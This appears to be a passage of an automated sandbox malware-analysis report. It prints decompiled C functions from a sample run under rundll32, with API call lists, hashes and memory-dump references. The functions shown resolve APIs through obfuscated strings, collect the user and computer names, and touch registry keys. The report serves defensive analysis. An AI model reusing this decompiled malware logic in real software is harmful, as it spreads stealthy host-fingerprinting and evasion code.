                                                  • Instruction Fuzzy Hash: E811A333A1162CA786266BBAAC8CCEF3F9DEF85564705015FF50597200DE35DD0297E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05476CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 05476D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 05476D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 05476D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05476DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05476DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 05476DC3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 6edc58278b7ce31e76d58aa28c58cb6d9c46c53e6b4ae4d9811e5c89180f1587
                                                  • Instruction ID: 240204714d06eff8e8542a3480baed5e6b5d5e47c2a2ba9aa2ae879609194773
                                                  • Opcode Fuzzy Hash: 6edc58278b7ce31e76d58aa28c58cb6d9c46c53e6b4ae4d9811e5c89180f1587
                                                  • Instruction Fuzzy Hash: 4E313032D10A1DABDB01DFB8C444ADFBBB6AF49210F154466E915EB210DB719E05CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0547692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E05472049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x547d27c; // 0x1f6a5a8
					_t1 = _t23 + 0x547e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x547d27c; // 0x1f6a5a8
					_t2 = _t26 + 0x547e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E05479039(_t54);
					} else {
						_t30 =  *0x547d27c; // 0x1f6a5a8
						_t5 = _t30 + 0x547e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x547d27c; // 0x1f6a5a8
							_t7 = _t33 + 0x547e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x547d27c; // 0x1f6a5a8
								_t9 = _t36 + 0x547e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x547d27c; // 0x1f6a5a8
									_t11 = _t39 + 0x547e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0547727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                  0x0547693b
                                                  0x0547693f
                                                  0x05476a01
                                                  0x05476945
                                                  0x05476945
                                                  0x0547694a
                                                  0x0547695d
                                                  0x0547695f
                                                  0x05476964
                                                  0x0547696c
                                                  0x05476973
                                                  0x05476977
                                                  0x0547697a
                                                  0x054769f9
                                                  0x054769fa
                                                  0x0547697c
                                                  0x0547697c
                                                  0x05476981
                                                  0x05476989
                                                  0x0547698d
                                                  0x05476990
                                                  0x00000000
                                                  0x05476992
                                                  0x05476992
                                                  0x05476997
                                                  0x0547699f
                                                  0x054769a3
                                                  0x054769a6
                                                  0x00000000
                                                  0x054769a8
                                                  0x054769a8
                                                  0x054769ad
                                                  0x054769b5
                                                  0x054769b9
                                                  0x054769bc
                                                  0x00000000
                                                  0x054769be
                                                  0x054769be
                                                  0x054769c3
                                                  0x054769cb
                                                  0x054769cf
                                                  0x054769d2
                                                  0x00000000
                                                  0x054769d4
                                                  0x054769da
                                                  0x054769df
                                                  0x054769e6
                                                  0x054769ed
                                                  0x054769f0
                                                  0x00000000
                                                  0x054769f2
                                                  0x054769f5
                                                  0x054769f5
                                                  0x054769f0
                                                  0x054769d2
                                                  0x054769bc
                                                  0x054769a6
                                                  0x05476990
                                                  0x0547697a
                                                  0x05476a0f

                                                  APIs
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,0547207A,?,00000001,?,?,00000000,00000000), ref: 05476951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 05476973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 05476989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0547699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 054769B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 054769CB
                                                    • Part of subcall function 0547727B: memset.NTDLL ref: 054772FA
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 1955fee37e191a654898b4cbba08d80d64d6a5a8e93db471ba30629fbaa1231c
                                                  • Instruction ID: bd37f968939a0d976fda06a92c3af14a7bdf48522bb14624b49779798ec0ff9f
                                                  • Opcode Fuzzy Hash: 1955fee37e191a654898b4cbba08d80d64d6a5a8e93db471ba30629fbaa1231c
                                                  • Instruction Fuzzy Hash: B8213CB161160EEFDB24DFB9D844EDB7BECEB0825070245AAE605CB311E630ED018B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05477649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E05477649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E05472049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E05479039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x547a33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                  0x05477657
                                                  0x0547765a
                                                  0x0547765d
                                                  0x05477663
                                                  0x05477668
                                                  0x0547766e
                                                  0x05477676
                                                  0x05477679
                                                  0x0547767f
                                                  0x05477684
                                                  0x05477691
                                                  0x0547769e
                                                  0x054776a2
                                                  0x054776a4
                                                  0x054776a8
                                                  0x054776ab
                                                  0x054776bb
                                                  0x0547770d
                                                  0x0547770e
                                                  0x054776bd
                                                  0x054776c0
                                                  0x054776c7
                                                  0x054776ca
                                                  0x054776dd
                                                  0x00000000
                                                  0x054776df
                                                  0x054776e2
                                                  0x054776e7
                                                  0x054776f5
                                                  0x054776f8
                                                  0x05477700
                                                  0x05477703
                                                  0x00000000
                                                  0x05477705
                                                  0x05477705
                                                  0x05477708
                                                  0x05477708
                                                  0x05477703
                                                  0x054776dd
                                                  0x05477713
                                                  0x05477714
                                                  0x05477684
                                                  0x0547771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,0547A338), ref: 0547765D
                                                  • GetComputerNameW.KERNEL32(00000000,0547A338), ref: 05477679
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • GetUserNameW.ADVAPI32(00000000,0547A338), ref: 054776B3
                                                  • GetComputerNameW.KERNEL32(0547A338,?), ref: 054776D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0547A338,00000000,0547A33A,00000000,00000000,?,?,0547A338), ref: 054776F8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 6d3f1f36a63b6eb818620bc33f2a65da457976ea7edfa613ef5df6782288cc15
                                                  • Instruction ID: 4613f4f908ca4cd96b518f3a6386ee8112e0855bccd74ddfa0ab716a6fc96497
                                                  • Opcode Fuzzy Hash: 6d3f1f36a63b6eb818620bc33f2a65da457976ea7edfa613ef5df6782288cc15
                                                  • Instruction Fuzzy Hash: 6521D97691020CFBCB15DFE9D9C5CEEBBB8EF44244B5044AAE502E7200DB30AB44DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05471585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E05471585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E05477F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0547A9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x547d130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                  0x05471585
                                                  0x05471592
                                                  0x05471594
                                                  0x054715f7
                                                  0x00000000
                                                  0x054715f7
                                                  0x054715ac
                                                  0x054715b3
                                                  0x054715bf
                                                  0x054715c4
                                                  0x054715c6
                                                  0x054715c8
                                                  0x054715ca
                                                  0x054715cc
                                                  0x054715ce
                                                  0x054715da
                                                  0x054715ea
                                                  0x00000000
                                                  0x054715dc
                                                  0x054715dc
                                                  0x054715e3
                                                  0x054715f0
                                                  0x054715f0
                                                  0x054715f0
                                                  0x054715e3
                                                  0x054715da
                                                  0x054715f5
                                                  0x00000000
                                                  0x00000000
                                                  0x054715fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,054711DA,?,?,00000000,00000000), ref: 054715BF
                                                  • ResetEvent.KERNEL32(?), ref: 054715C4
                                                  • GetLastError.KERNEL32 ref: 054715DC
                                                  • GetLastError.KERNEL32(?,?,00000102,054711DA,?,?,00000000,00000000), ref: 054715F7
                                                    • Part of subcall function 05477F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,054715A4,?,?,?,?,00000102,054711DA,?,?,00000000), ref: 05477F33
                                                    • Part of subcall function 05477F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,054715A4,?,?,?,?,00000102,054711DA,?), ref: 05477F91
                                                    • Part of subcall function 05477F27: lstrcpy.KERNEL32(00000000,00000000), ref: 05477FA1
                                                  • SetEvent.KERNEL32(?), ref: 054715EA
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: b1503dbb3262afa215f4a754ca3b56568a5ad5d61ce1622e3c07ac5d9f2410dc
                                                  • Instruction ID: 2340e02cb4f6ed17e773c7abed6d78f467e55dd4844e05e13af7eac5a66ea203
                                                  • Opcode Fuzzy Hash: b1503dbb3262afa215f4a754ca3b56568a5ad5d61ce1622e3c07ac5d9f2410dc
                                                  • Instruction Fuzzy Hash: 2A01AD31114209ABDA346A72DC88FEBBBA9FF44360F104A2AF152911E0DA20E815DA61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05478F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E05478F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x547d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x547d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x547d258 = _t6;
					 *0x547d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x547d254 = _t7;
					if(_t7 == 0) {
						 *0x547d254 =  *0x547d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                  0x05478f18
                                                  0x05478f20
                                                  0x05478f25
                                                  0x00000000
                                                  0x05478f7a
                                                  0x05478f27
                                                  0x05478f2f
                                                  0x05478f37
                                                  0x05478f37
                                                  0x05478f77
                                                  0x00000000
                                                  0x05478f77
                                                  0x05478f39
                                                  0x05478f39
                                                  0x05478f3e
                                                  0x05478f50
                                                  0x05478f55
                                                  0x05478f5b
                                                  0x05478f63
                                                  0x05478f68
                                                  0x05478f6a
                                                  0x05478f6a
                                                  0x00000000
                                                  0x05478f71
                                                  0x05478f33
                                                  0x00000000
                                                  0x00000000
                                                  0x05478f35
                                                  0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05476A90,?,?,00000001,?,?,?,0547807D,?), ref: 05478F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05478F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05478F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,0547807D,?), ref: 05478F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05478F7A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 428fefc9f9c2c99cded01b2cbc9cdd6923cd682a9247ca25b8ee887914dc8808
                                                  • Instruction ID: eb96e1b5337bf8d3b2bbb3acd9205f1524d36142a1fadaf585c0ebca3d15ba8a
                                                  • Opcode Fuzzy Hash: 428fefc9f9c2c99cded01b2cbc9cdd6923cd682a9247ca25b8ee887914dc8808
                                                  • Instruction Fuzzy Hash: D8F0AF30BB534D9AE72C8F64AC0EBD53FA2BB44780F40019AF152D62D5DE708402CF24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054717D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E054717D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x547d33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E0547809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E054788B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E05479039(_a8);
						goto L29;
					}
					_t65 =  *0x547d27c; // 0x1f6a5a8
					_t16 = _t65 + 0x547e8fe; // 0x65696c43
					_t68 = E0547809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d0547c0
						if(E0547A635(_t103,  *_t33, _t97, _a8,  *0x547d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x547d27c; // 0x1f6a5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x547ea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x547e89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E0547816C(_t73,  *0x547d334,  *0x547d338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x547d27c; // 0x1f6a5a8
									_t44 = _t75 + 0x547e871; // 0x74666f53
									_t78 = E0547809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d0547c0
										E05472659( *_t47, _t97, _a8,  *0x547d338, _a24);
										_t49 = _t107 + 0x10; // 0x3d0547c0
										E05472659( *_t49, _t97, _t105,  *0x547d330, _a16);
										E05479039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d0547c0
									E05472659( *_t40, _t97, _a8,  *0x547d338, _a24);
									_t43 = _t107 + 0x10; // 0x3d0547c0
									E05472659( *_t43, _t97, _a8,  *0x547d330, _a16);
								}
								if( *_t107 != 0) {
									E05479039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d0547c0
					if(E05476BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d0547c0
							E0547A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E05479039(_t106);
						_t104 = _a16;
					}
					E05479039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E0547A8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x547d33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                  0x054717d5
                                                  0x054717de
                                                  0x054717e5
                                                  0x054717ea
                                                  0x05471857
                                                  0x0547185d
                                                  0x05471862
                                                  0x0547186b
                                                  0x05471872
                                                  0x05471875
                                                  0x054719e9
                                                  0x054719f0
                                                  0x054719f0
                                                  0x054719f5
                                                  0x054719f7
                                                  0x054719f7
                                                  0x05471a00
                                                  0x05471a00
                                                  0x0547187b
                                                  0x05471887
                                                  0x054719df
                                                  0x054719e2
                                                  0x00000000
                                                  0x054719e2
                                                  0x0547188d
                                                  0x05471892
                                                  0x0547189b
                                                  0x054718a2
                                                  0x054718a5
                                                  0x054718ef
                                                  0x054718ef
                                                  0x05471902
                                                  0x0547190c
                                                  0x05471914
                                                  0x05471919
                                                  0x05471923
                                                  0x05471923
                                                  0x0547191b
                                                  0x0547191b
                                                  0x0547191b
                                                  0x0547191b
                                                  0x05471945
                                                  0x0547194d
                                                  0x0547197b
                                                  0x05471980
                                                  0x05471989
                                                  0x0547198e
                                                  0x05471992
                                                  0x054719c4
                                                  0x05471994
                                                  0x054719a1
                                                  0x054719a4
                                                  0x054719b4
                                                  0x054719b7
                                                  0x054719bd
                                                  0x054719bd
                                                  0x0547194f
                                                  0x0547195c
                                                  0x0547195f
                                                  0x05471971
                                                  0x05471974
                                                  0x05471974
                                                  0x054719ce
                                                  0x054719da
                                                  0x054719d0
                                                  0x054719d3
                                                  0x054719d3
                                                  0x054719ce
                                                  0x05471945
                                                  0x00000000
                                                  0x0547190c
                                                  0x054718b4
                                                  0x054718be
                                                  0x054718c0
                                                  0x054718c5
                                                  0x054718c9
                                                  0x054718cb
                                                  0x054718d6
                                                  0x054718d9
                                                  0x054718d9
                                                  0x054718df
                                                  0x054718e4
                                                  0x054718e4
                                                  0x054718ea
                                                  0x00000000
                                                  0x054718ea
                                                  0x054717ef
                                                  0x00000000
                                                  0x05471816
                                                  0x05471816
                                                  0x05471822
                                                  0x05471835
                                                  0x0547183b
                                                  0x05471843
                                                  0x00000000
                                                  0x05471843

                                                  APIs
                                                  • StrChrA.SHLWAPI(05473C81,0000005F,00000000,00000000,00000104), ref: 05471808
                                                  • lstrcpy.KERNEL32(?,?), ref: 05471835
                                                    • Part of subcall function 0547809F: lstrlen.KERNEL32(?,00000000,0547D330,00000001,05472200,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9), ref: 054780A8
                                                    • Part of subcall function 0547809F: mbstowcs.NTDLL ref: 054780CF
                                                    • Part of subcall function 0547809F: memset.NTDLL ref: 054780E1
                                                    • Part of subcall function 05472659: lstrlenW.KERNEL32(05473C81,?,?,054719A9,3D0547C0,80000002,05473C81,05478B1E,74666F53,4D4C4B48,05478B1E,?,3D0547C0,80000002,05473C81,?), ref: 05472679
                                                    • Part of subcall function 05479039: HeapFree.KERNEL32(00000000,00000000,05477F18,00000000,?,?,00000000), ref: 05479045
                                                  • lstrcpy.KERNEL32(?,00000000), ref: 05471857
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                  • String ID: \
                                                  • API String ID: 3924217599-2967466578
                                                  • Opcode ID: 1ffbb197b0a3079c95d102f5fd25ffa6d51ae5dc4937253b31e99f954765c161
                                                  • Instruction ID: da555e5e1195e3fb65daccae9bd43382c97bf4026e29162c0273d1b918308b9b
                                                  • Opcode Fuzzy Hash: 1ffbb197b0a3079c95d102f5fd25ffa6d51ae5dc4937253b31e99f954765c161
                                                  • Instruction Fuzzy Hash: 06516AB661020EEFDF159FA1CD45EEA3BBEFF08210F00855AFA5592120EB31D926DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0547163F, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 05471680
                                                  • SysFreeString.OLEAUT32(?), ref: 05471763
                                                    • Part of subcall function 054752F9: SysAllocString.OLEAUT32(0547C2B0), ref: 05475349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 054717B7
                                                  • SysFreeString.OLEAUT32(?), ref: 054717C5
                                                    • Part of subcall function 05472436: Sleep.KERNEL32(000001F4), ref: 0547247E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                  • String ID:
                                                  • API String ID: 3193056040-0
                                                  • Opcode ID: 32ed030bed561e729ec95dcd3428e4a75160e64b5b1ba5c2102262655031479f
                                                  • Instruction ID: bfa907df5d9a6511911fe37e6d19681a1c9630b5d16e79158b1b30927866032e
                                                  • Opcode Fuzzy Hash: 32ed030bed561e729ec95dcd3428e4a75160e64b5b1ba5c2102262655031479f
                                                  • Instruction Fuzzy Hash: E2511279A1424DEFCB10DFE8C8848DEB7B6FF88350B1589AAE505EB210DB719D45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 054752F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E054752F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
